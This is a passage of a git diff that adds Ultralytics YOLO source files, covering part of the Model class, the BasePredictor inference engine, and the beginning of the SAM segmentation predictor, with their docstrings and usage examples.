events, removing any custom callbacks that were + previously added. It iterates through all default callback events and replaces the current callbacks with the + default ones. + + The default callbacks are defined in the 'callbacks.default_callbacks' dictionary, which contains predefined + functions for various events in the model's lifecycle, such as on_train_start, on_epoch_end, etc. + + This method is useful when you want to revert to the original set of callbacks after making custom + modifications, ensuring consistent behavior across different runs or experiments. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> model.add_callback("on_train_start", custom_function) + >>> model.reset_callbacks() + # All callbacks are now reset to their default functions + """ + for event in callbacks.default_callbacks.keys(): + self.callbacks[event] = [callbacks.default_callbacks[event][0]] + + @staticmethod + def _reset_ckpt_args(args: dict) -> dict: + """ + Resets specific arguments when loading a PyTorch model checkpoint. + + This static method filters the input arguments dictionary to retain only a specific set of keys that are + considered important for model loading. It's used to ensure that only relevant arguments are preserved + when loading a model from a checkpoint, discarding any unnecessary or potentially conflicting settings. + + Args: + args (dict): A dictionary containing various model arguments and settings. + + Returns: + (dict): A new dictionary containing only the specified include keys from the input arguments. + + Examples: + >>> original_args = {"imgsz": 640, "data": "coco.yaml", "task": "detect", "batch": 16, "epochs": 100} + >>> reset_args = Model._reset_ckpt_args(original_args) + >>> print(reset_args) + {'imgsz': 640, 'data': 'coco.yaml', 'task': 'detect'} + """ + include = {"imgsz", "data", "task", "single_cls"} # only remember these arguments when loading a PyTorch model + return {k: v for k, v in args.items() if k in include} + + # def __getattr__(self, attr): + # """Raises error if object has no requested attribute.""" + # name = self.__class__.__name__ + # raise AttributeError(f"'{name}' object has no attribute '{attr}'. See valid attributes below.\n{self.__doc__}") + + def _smart_load(self, key: str): + """ + Loads the appropriate module based on the model task. + + This method dynamically selects and returns the correct module (model, trainer, validator, or predictor) + based on the current task of the model and the provided key. It uses the task_map attribute to determine + the correct module to load. + + Args: + key (str): The type of module to load. Must be one of 'model', 'trainer', 'validator', or 'predictor'. + + Returns: + (object): The loaded module corresponding to the specified key and current task. + + Raises: + NotImplementedError: If the specified key is not supported for the current task. + + Examples: + >>> model = Model(task="detect") + >>> predictor = model._smart_load("predictor") + >>> trainer = model._smart_load("trainer") + + Notes: + - This method is typically used internally by other methods of the Model class. + - The task_map attribute should be properly initialized with the correct mappings for each task. + """ + try: + return self.task_map[self.task][key] + except Exception as e: + name = self.__class__.__name__ + mode = inspect.stack()[1][3] # get the function name. + raise NotImplementedError( + emojis(f"WARNING ⚠️ '{name}' model does not support '{mode}' mode for '{self.task}' task yet.") + ) from e + + @property + def task_map(self) -> dict: + """ + Provides a mapping from model tasks to corresponding classes for different modes. + + This property method returns a dictionary that maps each supported task (e.g., detect, segment, classify) + to a nested dictionary. The nested dictionary contains mappings for different operational modes + (model, trainer, validator, predictor) to their respective class implementations. + + The mapping allows for dynamic loading of appropriate classes based on the model's task and the + desired operational mode. This facilitates a flexible and extensible architecture for handling + various tasks and modes within the Ultralytics framework. + + Returns: + (Dict[str, Dict[str, Any]]): A dictionary where keys are task names (str) and values are + nested dictionaries. Each nested dictionary has keys 'model', 'trainer', 'validator', and + 'predictor', mapping to their respective class implementations. + + Examples: + >>> model = Model() + >>> task_map = model.task_map + >>> detect_class_map = task_map["detect"] + >>> segment_class_map = task_map["segment"] + + Note: + The actual implementation of this method may vary depending on the specific tasks and + classes supported by the Ultralytics framework. The docstring provides a general + description of the expected behavior and structure. + """ + raise NotImplementedError("Please provide task map for your model!") + + def eval(self): + """ + Sets the model to evaluation mode. + + This method changes the model's mode to evaluation, which affects layers like dropout and batch normalization + that behave differently during training and evaluation. + + Returns: + (Model): The model instance with evaluation mode set. + + Examples: + >> model = YOLO("yolo11n.pt") + >> model.eval() + """ + self.model.eval() + return self + + def __getattr__(self, name): + """ + Enables accessing model attributes directly through the Model class. + + This method provides a way to access attributes of the underlying model directly through the Model class + instance. It first checks if the requested attribute is 'model', in which case it returns the model from + the module dictionary. Otherwise, it delegates the attribute lookup to the underlying model. + + Args: + name (str): The name of the attribute to retrieve. + + Returns: + (Any): The requested attribute value. + + Raises: + AttributeError: If the requested attribute does not exist in the model. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> print(model.stride) + >>> print(model.task) + """ + if name == "model": + return self._modules["model"] + return getattr(self.model, name) diff --git a/2024.ultralytics/v8.3.40/engine/predictor.py b/2024.ultralytics/v8.3.40/engine/predictor.py new file mode 100644 index 0000000..c28e189 --- /dev/null +++ b/2024.ultralytics/v8.3.40/engine/predictor.py @@ -0,0 +1,408 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license +""" +Run prediction on images, videos, directories, globs, YouTube, webcam, streams, etc. + +Usage - sources: + $ yolo mode=predict model=yolov8n.pt source=0 # webcam + img.jpg # image + vid.mp4 # video + screen # screenshot + path/ # directory + list.txt # list of images + list.streams # list of streams + 'path/*.jpg' # glob + 'https://youtu.be/LNwODJXcvt4' # YouTube + 'rtsp://example.com/media.mp4' # RTSP, RTMP, HTTP, TCP stream + +Usage - formats: + $ yolo mode=predict model=yolov8n.pt # PyTorch + yolov8n.torchscript # TorchScript + yolov8n.onnx # ONNX Runtime or OpenCV DNN with dnn=True + yolov8n_openvino_model # OpenVINO + yolov8n.engine # TensorRT + yolov8n.mlpackage # CoreML (macOS-only) + yolov8n_saved_model # TensorFlow SavedModel + yolov8n.pb # TensorFlow GraphDef + yolov8n.tflite # TensorFlow Lite + yolov8n_edgetpu.tflite # TensorFlow Edge TPU + yolov8n_paddle_model # PaddlePaddle + yolov8n.mnn # MNN + yolov8n_ncnn_model # NCNN +""" + +import platform +import re +import threading +from pathlib import Path + +import cv2 +import numpy as np +import torch + +from ultralytics.cfg import get_cfg, get_save_dir +from ultralytics.data import load_inference_source +from ultralytics.data.augment import LetterBox, classify_transforms +from ultralytics.nn.autobackend import AutoBackend +from ultralytics.utils import DEFAULT_CFG, LOGGER, MACOS, WINDOWS, callbacks, colorstr, ops +from ultralytics.utils.checks import check_imgsz, check_imshow +from ultralytics.utils.files import increment_path +from ultralytics.utils.torch_utils import select_device, smart_inference_mode + +STREAM_WARNING = """ +WARNING ⚠️ inference results will accumulate in RAM unless `stream=True` is passed, causing potential out-of-memory +errors for large sources or long-running streams and videos. See https://docs.ultralytics.com/modes/predict/ for help. + +Example: + results = model(source=..., stream=True) # generator of Results objects + for r in results: + boxes = r.boxes # Boxes object for bbox outputs + masks = r.masks # Masks object for segment masks outputs + probs = r.probs # Class probabilities for classification outputs +""" + + +class BasePredictor: + """ + BasePredictor. + + A base class for creating predictors. + + Attributes: + args (SimpleNamespace): Configuration for the predictor. + save_dir (Path): Directory to save results. + done_warmup (bool): Whether the predictor has finished setup. + model (nn.Module): Model used for prediction. + data (dict): Data configuration. + device (torch.device): Device used for prediction. + dataset (Dataset): Dataset used for prediction. + vid_writer (dict): Dictionary of {save_path: video_writer, ...} writer for saving video output. + """ + + def __init__(self, cfg=DEFAULT_CFG, overrides=None, _callbacks=None): + """ + Initializes the BasePredictor class. + + Args: + cfg (str, optional): Path to a configuration file. Defaults to DEFAULT_CFG. + overrides (dict, optional): Configuration overrides. Defaults to None. + """ + self.args = get_cfg(cfg, overrides) + self.save_dir = get_save_dir(self.args) + if self.args.conf is None: + self.args.conf = 0.25 # default conf=0.25 + self.done_warmup = False + if self.args.show: + self.args.show = check_imshow(warn=True) + + # Usable if setup is done + self.model = None + self.data = self.args.data # data_dict + self.imgsz = None + self.device = None + self.dataset = None + self.vid_writer = {} # dict of {save_path: video_writer, ...} + self.plotted_img = None + self.source_type = None + self.seen = 0 + self.windows = [] + self.batch = None + self.results = None + self.transforms = None + self.callbacks = _callbacks or callbacks.get_default_callbacks() + self.txt_path = None + self._lock = threading.Lock() # for automatic thread-safe inference + callbacks.add_integration_callbacks(self) + + def preprocess(self, im): + """ + Prepares input image before inference. + + Args: + im (torch.Tensor | List(np.ndarray)): BCHW for tensor, [(HWC) x B] for list. + """ + not_tensor = not isinstance(im, torch.Tensor) + if not_tensor: + im = np.stack(self.pre_transform(im)) + im = im[..., ::-1].transpose((0, 3, 1, 2)) # BGR to RGB, BHWC to BCHW, (n, 3, h, w) + im = np.ascontiguousarray(im) # contiguous + im = torch.from_numpy(im) + + im = im.to(self.device) + im = im.half() if self.model.fp16 else im.float() # uint8 to fp16/32 + if not_tensor: + im /= 255 # 0 - 255 to 0.0 - 1.0 + return im + + def inference(self, im, *args, **kwargs): + """Runs inference on a given image using the specified model and arguments.""" + visualize = ( + increment_path(self.save_dir / Path(self.batch[0][0]).stem, mkdir=True) + if self.args.visualize and (not self.source_type.tensor) + else False + ) + return self.model(im, augment=self.args.augment, visualize=visualize, embed=self.args.embed, *args, **kwargs) + + def pre_transform(self, im): + """ + Pre-transform input image before inference. + + Args: + im (List(np.ndarray)): (N, 3, h, w) for tensor, [(h, w, 3) x N] for list. + + Returns: + (list): A list of transformed images. + """ + same_shapes = len({x.shape for x in im}) == 1 + letterbox = LetterBox( + self.imgsz, + auto=same_shapes and (self.model.pt or getattr(self.model, "dynamic", False)), + stride=self.model.stride, + ) + return [letterbox(image=x) for x in im] + + def postprocess(self, preds, img, orig_imgs): + """Post-processes predictions for an image and returns them.""" + return preds + + def __call__(self, source=None, model=None, stream=False, *args, **kwargs): + """Performs inference on an image or stream.""" + self.stream = stream + if stream: + return self.stream_inference(source, model, *args, **kwargs) + else: + return list(self.stream_inference(source, model, *args, **kwargs)) # merge list of Result into one + + def predict_cli(self, source=None, model=None): + """ + Method used for Command Line Interface (CLI) prediction. + + This function is designed to run predictions using the CLI. It sets up the source and model, then processes + the inputs in a streaming manner. This method ensures that no outputs accumulate in memory by consuming the + generator without storing results. + + Note: + Do not modify this function or remove the generator. The generator ensures that no outputs are + accumulated in memory, which is critical for preventing memory issues during long-running predictions. + """ + gen = self.stream_inference(source, model) + for _ in gen: # sourcery skip: remove-empty-nested-block, noqa + pass + + def setup_source(self, source): + """Sets up source and inference mode.""" + self.imgsz = check_imgsz(self.args.imgsz, stride=self.model.stride, min_dim=2) # check image size + self.transforms = ( + getattr( + self.model.model, + "transforms", + classify_transforms(self.imgsz[0], crop_fraction=self.args.crop_fraction), + ) + if self.args.task == "classify" + else None + ) + self.dataset = load_inference_source( + source=source, + batch=self.args.batch, + vid_stride=self.args.vid_stride, + buffer=self.args.stream_buffer, + ) + self.source_type = self.dataset.source_type + if not getattr(self, "stream", True) and ( + self.source_type.stream + or self.source_type.screenshot + or len(self.dataset) > 1000 # many images + or any(getattr(self.dataset, "video_flag", [False])) + ): # videos + LOGGER.warning(STREAM_WARNING) + self.vid_writer = {} + + @smart_inference_mode() + def stream_inference(self, source=None, model=None, *args, **kwargs): + """Streams real-time inference on camera feed and saves results to file.""" + if self.args.verbose: + LOGGER.info("") + + # Setup model + if not self.model: + self.setup_model(model) + + with self._lock: # for thread-safe inference + # Setup source every time predict is called + self.setup_source(source if source is not None else self.args.source) + + # Check if save_dir/ label file exists + if self.args.save or self.args.save_txt: + (self.save_dir / "labels" if self.args.save_txt else self.save_dir).mkdir(parents=True, exist_ok=True) + + # Warmup model + if not self.done_warmup: + self.model.warmup(imgsz=(1 if self.model.pt or self.model.triton else self.dataset.bs, 3, *self.imgsz)) + self.done_warmup = True + + self.seen, self.windows, self.batch = 0, [], None + profilers = ( + ops.Profile(device=self.device), + ops.Profile(device=self.device), + ops.Profile(device=self.device), + ) + self.run_callbacks("on_predict_start") + for self.batch in self.dataset: + self.run_callbacks("on_predict_batch_start") + paths, im0s, s = self.batch + + # Preprocess + with profilers[0]: + im = self.preprocess(im0s) + + # Inference + with profilers[1]: + preds = self.inference(im, *args, **kwargs) + if self.args.embed: + yield from [preds] if isinstance(preds, torch.Tensor) else preds # yield embedding tensors + continue + + # Postprocess + with profilers[2]: + self.results = self.postprocess(preds, im, im0s) + self.run_callbacks("on_predict_postprocess_end") + + # Visualize, save, write results + n = len(im0s) + for i in range(n): + self.seen += 1 + self.results[i].speed = { + "preprocess": profilers[0].dt * 1e3 / n, + "inference": profilers[1].dt * 1e3 / n, + "postprocess": profilers[2].dt * 1e3 / n, + } + if self.args.verbose or self.args.save or self.args.save_txt or self.args.show: + s[i] += self.write_results(i, Path(paths[i]), im, s) + + # Print batch results + if self.args.verbose: + LOGGER.info("\n".join(s)) + + self.run_callbacks("on_predict_batch_end") + yield from self.results + + # Release assets + for v in self.vid_writer.values(): + if isinstance(v, cv2.VideoWriter): + v.release() + + # Print final results + if self.args.verbose and self.seen: + t = tuple(x.t / self.seen * 1e3 for x in profilers) # speeds per image + LOGGER.info( + f"Speed: %.1fms preprocess, %.1fms inference, %.1fms postprocess per image at shape " + f"{(min(self.args.batch, self.seen), 3, *im.shape[2:])}" % t + ) + if self.args.save or self.args.save_txt or self.args.save_crop: + nl = len(list(self.save_dir.glob("labels/*.txt"))) # number of labels + s = f"\n{nl} label{'s' * (nl > 1)} saved to {self.save_dir / 'labels'}" if self.args.save_txt else "" + LOGGER.info(f"Results saved to {colorstr('bold', self.save_dir)}{s}") + self.run_callbacks("on_predict_end") + + def setup_model(self, model, verbose=True): + """Initialize YOLO model with given parameters and set it to evaluation mode.""" + self.model = AutoBackend( + weights=model or self.args.model, + device=select_device(self.args.device, verbose=verbose), + dnn=self.args.dnn, + data=self.args.data, + fp16=self.args.half, + batch=self.args.batch, + fuse=True, + verbose=verbose, + ) + + self.device = self.model.device # update device + self.args.half = self.model.fp16 # update half + self.model.eval() + + def write_results(self, i, p, im, s): + """Write inference results to a file or directory.""" + string = "" # print string + if len(im.shape) == 3: + im = im[None] # expand for batch dim + if self.source_type.stream or self.source_type.from_img or self.source_type.tensor: # batch_size >= 1 + string += f"{i}: " + frame = self.dataset.count + else: + match = re.search(r"frame (\d+)/", s[i]) + frame = int(match[1]) if match else None # 0 if frame undetermined + + self.txt_path = self.save_dir / "labels" / (p.stem + ("" if self.dataset.mode == "image" else f"_{frame}")) + string += "{:g}x{:g} ".format(*im.shape[2:]) + result = self.results[i] + result.save_dir = self.save_dir.__str__() # used in other locations + string += f"{result.verbose()}{result.speed['inference']:.1f}ms" + + # Add predictions to image + if self.args.save or self.args.show: + self.plotted_img = result.plot( + line_width=self.args.line_width, + boxes=self.args.show_boxes, + conf=self.args.show_conf, + labels=self.args.show_labels, + im_gpu=None if self.args.retina_masks else im[i], + ) + + # Save results + if self.args.save_txt: + result.save_txt(f"{self.txt_path}.txt", save_conf=self.args.save_conf) + if self.args.save_crop: + result.save_crop(save_dir=self.save_dir / "crops", file_name=self.txt_path.stem) + if self.args.show: + self.show(str(p)) + if self.args.save: + self.save_predicted_images(str(self.save_dir / p.name), frame) + + return string + + def save_predicted_images(self, save_path="", frame=0): + """Save video predictions as mp4 at specified path.""" + im = self.plotted_img + + # Save videos and streams + if self.dataset.mode in {"stream", "video"}: + fps = self.dataset.fps if self.dataset.mode == "video" else 30 + frames_path = f'{save_path.split(".", 1)[0]}_frames/' + if save_path not in self.vid_writer: # new video + if self.args.save_frames: + Path(frames_path).mkdir(parents=True, exist_ok=True) + suffix, fourcc = (".mp4", "avc1") if MACOS else (".avi", "WMV2") if WINDOWS else (".avi", "MJPG") + self.vid_writer[save_path] = cv2.VideoWriter( + filename=str(Path(save_path).with_suffix(suffix)), + fourcc=cv2.VideoWriter_fourcc(*fourcc), + fps=fps, # integer required, floats produce error in MP4 codec + frameSize=(im.shape[1], im.shape[0]), # (width, height) + ) + + # Save video + self.vid_writer[save_path].write(im) + if self.args.save_frames: + cv2.imwrite(f"{frames_path}{frame}.jpg", im) + + # Save images + else: + cv2.imwrite(str(Path(save_path).with_suffix(".jpg")), im) # save to JPG for best support + + def show(self, p=""): + """Display an image in a window using the OpenCV imshow function.""" + im = self.plotted_img + if platform.system() == "Linux" and p not in self.windows: + self.windows.append(p) + cv2.namedWindow(p, cv2.WINDOW_NORMAL | cv2.WINDOW_KEEPRATIO) # allow window resize (Linux) + cv2.resizeWindow(p, im.shape[1], im.shape[0]) # (width, height) + cv2.imshow(p, im) + cv2.waitKey(300 if self.dataset.mode == "image" else 1) # 1 millisecond + + def run_callbacks(self, event: str): + """Runs all registered callbacks for a specific event.""" + for callback in self.callbacks.get(event, []): + callback(self) + + def add_callback(self, event: str, func): + """Add callback.""" + self.callbacks[event].append(func) diff --git a/2024.ultralytics/v8.3.40/models/sam/predict.py b/2024.ultralytics/v8.3.40/models/sam/predict.py new file mode 100644 index 0000000..540d100 --- /dev/null +++ b/2024.ultralytics/v8.3.40/models/sam/predict.py @@ -0,0 +1,1606 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license +""" +Generate predictions using the Segment Anything Model (SAM). + +SAM is an advanced image segmentation model offering features like promptable segmentation and zero-shot performance. +This module contains the implementation of the prediction logic and auxiliary utilities required to perform segmentation +using SAM. It forms an integral part of the Ultralytics framework and is designed for high-performance, real-time image +segmentation tasks. +""" + +from collections import OrderedDict + +import numpy as np +import torch +import torch.nn.functional as F + +from ultralytics.data.augment import LetterBox +from ultralytics.engine.predictor import BasePredictor +from ultralytics.engine.results import Results +from ultralytics.utils import DEFAULT_CFG, ops +from ultralytics.utils.torch_utils import select_device, smart_inference_mode + +from .amg import ( + batch_iterator, + batched_mask_to_box, + build_all_layer_point_grids, + calculate_stability_score, + generate_crop_boxes, + is_box_near_crop_edge, + remove_small_regions, + uncrop_boxes_xyxy, + uncrop_masks, +) +from .build import build_sam + + +class Predictor(BasePredictor): + """ + Predictor class for SAM, enabling real-time image segmentation with promptable capabilities. + + This class extends BasePredictor and implements the Segment Anything Model (SAM) for advanced image + segmentation tasks. It supports various input prompts like points, bounding boxes, and masks for + fine-grained control over segmentation results. + + Attributes: + args (SimpleNamespace): Configuration arguments for the predictor. + model (torch.nn.Module): The loaded SAM model. + device (torch.device): The device (CPU or GPU) on which the model is loaded. + im (torch.Tensor): The preprocessed input image. + features (torch.Tensor): Extracted image features. + prompts (Dict): Dictionary to store various types of prompts (e.g., bboxes, points, masks). + segment_all (bool): Flag to indicate if full image segmentation should be performed. + mean (torch.Tensor): Mean values for image normalization. + std (torch.Tensor): Standard deviation values for image normalization. + + Methods: + preprocess: Prepares input images for model inference. + pre_transform: Performs initial transformations on the input image. + inference: Performs segmentation inference based on input prompts. + prompt_inference: Internal function for prompt-based segmentation inference. + generate: Generates segmentation masks for an entire image. + setup_model: Initializes the SAM model for inference. + get_model: Builds and returns a SAM model. + postprocess: Post-processes model outputs to generate final results. + setup_source: Sets up the data source for inference. + set_image: Sets and preprocesses a single image for inference. + get_im_features: Extracts image features using the SAM image encoder. + set_prompts: Sets prompts for subsequent inference. + reset_image: Resets the current image and its features. + remove_small_regions: Removes small disconnected regions and holes from masks. + + Examples: + >>> predictor = Predictor() + >>> predictor.setup_model(model_path="sam_model.pt") + >>> predictor.set_image("image.jpg") + >>> masks, scores, boxes = predictor.generate() + >>> results = predictor.postprocess((masks, scores, boxes), im, orig_img) + """ + + def __init__(self, cfg=DEFAULT_CFG, overrides=None, _callbacks=None): + """ + Initialize the Predictor with configuration, overrides, and callbacks. + + Sets up the Predictor object for SAM (Segment Anything Model) and applies any configuration overrides or + callbacks provided. Initializes task-specific settings for SAM, such as retina_masks being set to True + for optimal results. + + Args: + cfg (Dict): Configuration dictionary containing default settings. + overrides (Dict | None): Dictionary of values to override default configuration. + _callbacks (Dict | None): Dictionary of callback functions to customize behavior. + + Examples: + >>> predictor = Predictor(cfg=DEFAULT_CFG) + >>> predictor = Predictor(overrides={"imgsz": 640}) + >>> predictor = Predictor(_callbacks={"on_predict_start": custom_callback}) + """ + if overrides is None: + overrides = {} + overrides.update(dict(task="segment", mode="predict", batch=1)) + super().__init__(cfg, overrides, _callbacks) + self.args.retina_masks = True + self.im = None + self.features = None + self.prompts = {} + self.segment_all = False + + def preprocess(self, im): + """ + Preprocess the input image for model inference. + + This method prepares the input image by applying transformations and normalization. It supports both + torch.Tensor and list of np.ndarray as input formats. + + Args: + im (torch.Tensor | List[np.ndarray]): Input image(s) in BCHW tensor format or list of HWC numpy arrays. + + Returns: + im (torch.Tensor): The preprocessed image tensor, normalized and converted to the appropriate dtype. + + Examples: + >>> predictor = Predictor() + >>> image = torch.rand(1, 3, 640, 640) + >>> preprocessed_image = predictor.preprocess(image) + """ + if self.im is not None: + return self.im + not_tensor = not isinstance(im, torch.Tensor) + if not_tensor: + im = np.stack(self.pre_transform(im)) + im = im[..., ::-1].transpose((0, 3, 1, 2)) + im = np.ascontiguousarray(im) + im = torch.from_numpy(im) + + im = im.to(self.device) + im = im.half() if self.model.fp16 else im.float() + if not_tensor: + im = (im - self.mean) / self.std + return im + + def pre_transform(self, im): + """ + Perform initial transformations on the input image for preprocessing. + + This method applies transformations such as resizing to prepare the image for further preprocessing. + Currently, batched inference is not supported; hence the list length should be 1. + + Args: + im (List[np.ndarray]): List containing a single image in HWC numpy array format. + + Returns: + (List[np.ndarray]): List containing the transformed image. + + Raises: + AssertionError: If the input list contains more than one image. + + Examples: + >>> predictor = Predictor() + >>> image = np.random.rand(480, 640, 3) # Single HWC image + >>> transformed = predictor.pre_transform([image]) + >>> print(len(transformed)) + 1 + """ + assert len(im) == 1, "SAM model does not currently support batched inference" + letterbox = LetterBox(self.args.imgsz, auto=False, center=False) + return [letterbox(image=x) for x in im] + + def inference(self, im, bboxes=None, points=None, labels=None, masks=None, multimask_output=False, *args, **kwargs): + """ + Perform image segmentation inference based on the given input cues, using the currently loaded image. + + This method leverages SAM's (Segment Anything Model) architecture consisting of image encoder, prompt + encoder, and mask decoder for real-time and promptable segmentation tasks. + + Args: + im (torch.Tensor): The preprocessed input image in tensor format, with shape (N, C, H, W). + bboxes (np.ndarray | List | None): Bounding boxes with shape (N, 4), in XYXY format. + points (np.ndarray | List | None): Points indicating object locations with shape (N, 2), in pixels. + labels (np.ndarray | List | None): Labels for point prompts, shape (N,). 1 = foreground, 0 = background. + masks (np.ndarray | None): Low-resolution masks from previous predictions, shape (N, H, W). For SAM H=W=256. + multimask_output (bool): Flag to return multiple masks. Helpful for ambiguous prompts. + *args (Any): Additional positional arguments. + **kwargs (Any): Additional keyword arguments. + + Returns: + (np.ndarray): The output masks in shape (C, H, W), where C is the number of generated masks. + (np.ndarray): An array of length C containing quality scores predicted by the model for each mask. + (np.ndarray): Low-resolution logits of shape (C, H, W) for subsequent inference, where H=W=256. + + Examples: + >>> predictor = Predictor() + >>> predictor.setup_model(model_path="sam_model.pt") + >>> predictor.set_image("image.jpg") + >>> masks, scores, logits = predictor.inference(im, bboxes=[[0, 0, 100, 100]]) + """ + # Override prompts if any stored in self.prompts + bboxes = self.prompts.pop("bboxes", bboxes) + points = self.prompts.pop("points", points) + masks = self.prompts.pop("masks", masks) + labels = self.prompts.pop("labels", labels) + + if all(i is None for i in [bboxes, points, masks]): + return self.generate(im, *args, **kwargs) + + return self.prompt_inference(im, bboxes, points, labels, masks, multimask_output) + + def prompt_inference(self, im, bboxes=None, points=None, labels=None, masks=None, multimask_output=False): + """ + Performs image segmentation inference based on input cues using SAM's specialized architecture. + + This internal function leverages the Segment Anything Model (SAM) for prompt-based, real-time segmentation. + It processes various input prompts such as bounding boxes, points, and masks to generate segmentation masks. + + Args: + im (torch.Tensor): Preprocessed input image tensor with shape (N, C, H, W). + bboxes (np.ndarray | List | None): Bounding boxes in XYXY format with shape (N, 4). + points (np.ndarray | List | None): Points indicating object locations with shape (N, 2) or (N, num_points, 2), in pixels. + labels (np.ndarray | List | None): Point prompt labels with shape (N,) or (N, num_points). 1 for foreground, 0 for background. + masks (np.ndarray | None): Low-res masks from previous predictions with shape (N, H, W). For SAM, H=W=256. + multimask_output (bool): Flag to return multiple masks for ambiguous prompts. + + Raises: + AssertionError: If the number of points don't match the number of labels, in case labels were passed. + + Returns: + (np.ndarray): Output masks with shape (C, H, W), where C is the number of generated masks. + (np.ndarray): Quality scores predicted by the model for each mask, with length C. + + Examples: + >>> predictor = Predictor() + >>> im = torch.rand(1, 3, 1024, 1024) + >>> bboxes = [[100, 100, 200, 200]] + >>> masks, scores, logits = predictor.prompt_inference(im, bboxes=bboxes) + """ + features = self.get_im_features(im) if self.features is None else self.features + + bboxes, points, labels, masks = self._prepare_prompts(im.shape[2:], bboxes, points, labels, masks) + points = (points, labels) if points is not None else None + # Embed prompts + sparse_embeddings, dense_embeddings = self.model.prompt_encoder(points=points, boxes=bboxes, masks=masks) + + # Predict masks + pred_masks, pred_scores = self.model.mask_decoder( + image_embeddings=features, + image_pe=self.model.prompt_encoder.get_dense_pe(), + sparse_prompt_embeddings=sparse_embeddings, + dense_prompt_embeddings=dense_embeddings, + multimask_output=multimask_output, + ) + + # (N, d, H, W) --> (N*d, H, W), (N, d) --> (N*d, ) + # `d` could be 1 or 3 depends on `multimask_output`. + return pred_masks.flatten(0, 1), pred_scores.flatten(0, 1) + + def _prepare_prompts(self, dst_shape, bboxes=None, points=None, labels=None, masks=None): + """ + Prepares and transforms the input prompts for processing based on the destination shape. + + Args: + dst_shape (tuple): The target shape (height, width) for the prompts. + bboxes (np.ndarray | List | None): Bounding boxes in XYXY format with shape (N, 4). + points (np.ndarray | List | None): Points indicating object locations with shape (N, 2) or (N, num_points, 2), in pixels. + labels (np.ndarray | List | None): Point prompt labels with shape (N,) or (N, num_points). 1 for foreground, 0 for background. + masks (List | np.ndarray, Optional): Masks for the objects, where each mask is a 2D array. + + Raises: + AssertionError: If the number of points don't match the number of labels, in case labels were passed. + + Returns: + (tuple): A tuple containing transformed bounding boxes, points, labels, and masks. + """ + src_shape = self.batch[1][0].shape[:2] + r = 1.0 if self.segment_all else min(dst_shape[0] / src_shape[0], dst_shape[1] / src_shape[1]) + # Transform input prompts + if points is not None: + points = torch.as_tensor(points, dtype=torch.float32, device=self.device) + points = points[None] if points.ndim == 1 else points + # Assuming labels are all positive if users don't pass labels. + if labels is None: + labels = np.ones(points.shape[:-1]) + labels = torch.as_tensor(labels, dtype=torch.int32, device=self.device) + assert ( + points.shape[-2] == labels.shape[-1] + ), f"Number of points {points.shape[-2]} should match number of labels {labels.shape[-1]}." + points *= r + if points.ndim == 2: + # (N, 2) --> (N, 1, 2), (N, ) --> (N, 1) + points, labels = points[:, None, :], labels[:, None] + if bboxes is not None: + bboxes = torch.as_tensor(bboxes, dtype=torch.float32, device=self.device) + bboxes = bboxes[None] if bboxes.ndim == 1 else bboxes + bboxes *= r + if masks is not None: + masks = torch.as_tensor(masks, dtype=torch.float32, device=self.device).unsqueeze(1) + return bboxes, points, labels, masks + + def generate( + self, + im, + crop_n_layers=0, + crop_overlap_ratio=512 / 1500, + crop_downscale_factor=1, + point_grids=None, + points_stride=32, + points_batch_size=64, + conf_thres=0.88, + stability_score_thresh=0.95, + stability_score_offset=0.95, + crop_nms_thresh=0.7, + ): + """ + Perform image segmentation using the Segment Anything Model (SAM). + + This method segments an entire image into constituent parts by leveraging SAM's advanced architecture + and real-time performance capabilities. It can optionally work on image crops for finer segmentation. + + Args: + im (torch.Tensor): Input tensor representing the preprocessed image with shape (N, C, H, W). + crop_n_layers (int): Number of layers for additional mask predictions on image crops. + crop_overlap_ratio (float): Overlap between crops, scaled down in subsequent layers. + crop_downscale_factor (int): Scaling factor for sampled points-per-side in each layer. + point_grids (List[np.ndarray] | None): Custom grids for point sampling normalized to [0,1]. + points_stride (int): Number of points to sample along each side of the image. + points_batch_size (int): Batch size for the number of points processed simultaneously. + conf_thres (float): Confidence threshold [0,1] for filtering based on mask quality prediction. + stability_score_thresh (float): Stability threshold [0,1] for mask filtering based on stability. + stability_score_offset (float): Offset value for calculating stability score. + crop_nms_thresh (float): IoU cutoff for NMS to remove duplicate masks between crops. + + Returns: + pred_masks (torch.Tensor): Segmented masks with shape (N, H, W). + pred_scores (torch.Tensor): Confidence scores for each mask with shape (N,). + pred_bboxes (torch.Tensor): Bounding boxes for each mask with shape (N, 4). + + Examples: + >>> predictor = Predictor() + >>> im = torch.rand(1, 3, 1024, 1024) # Example input image + >>> masks, scores, boxes = predictor.generate(im) + """ + import torchvision # scope for faster 'import ultralytics' + + self.segment_all = True + ih, iw = im.shape[2:] + crop_regions, layer_idxs = generate_crop_boxes((ih, iw), crop_n_layers, crop_overlap_ratio) + if point_grids is None: + point_grids = build_all_layer_point_grids(points_stride, crop_n_layers, crop_downscale_factor) + pred_masks, pred_scores, pred_bboxes, region_areas = [], [], [], [] + for crop_region, layer_idx in zip(crop_regions, layer_idxs): + x1, y1, x2, y2 = crop_region + w, h = x2 - x1, y2 - y1 + area = torch.tensor(w * h, device=im.device) + points_scale = np.array([[w, h]]) # w, h + # Crop image and interpolate to input size + crop_im = F.interpolate(im[..., y1:y2, x1:x2], (ih, iw), mode="bilinear", align_corners=False) + # (num_points, 2) + points_for_image = point_grids[layer_idx] * points_scale + crop_masks, crop_scores, crop_bboxes = [], [], [] + for (points,) in batch_iterator(points_batch_size, points_for_image): + pred_mask, pred_score = self.prompt_inference(crop_im, points=points, multimask_output=True) + # Interpolate predicted masks to input size + pred_mask = F.interpolate(pred_mask[None], (h, w), mode="bilinear", align_corners=False)[0] + idx = pred_score > conf_thres + pred_mask, pred_score = pred_mask[idx], pred_score[idx] + + stability_score = calculate_stability_score( + pred_mask, self.model.mask_threshold, stability_score_offset + ) + idx = stability_score > stability_score_thresh + pred_mask, pred_score = pred_mask[idx], pred_score[idx] + # Bool type is much more memory-efficient. + pred_mask = pred_mask > self.model.mask_threshold + # (N, 4) + pred_bbox = batched_mask_to_box(pred_mask).float() + keep_mask = ~is_box_near_crop_edge(pred_bbox, crop_region, [0, 0, iw, ih]) + if not torch.all(keep_mask): + pred_bbox, pred_mask, pred_score = pred_bbox[keep_mask], pred_mask[keep_mask], pred_score[keep_mask] + + crop_masks.append(pred_mask) + crop_bboxes.append(pred_bbox) + crop_scores.append(pred_score) + + # Do nms within this crop + crop_masks = torch.cat(crop_masks) + crop_bboxes = 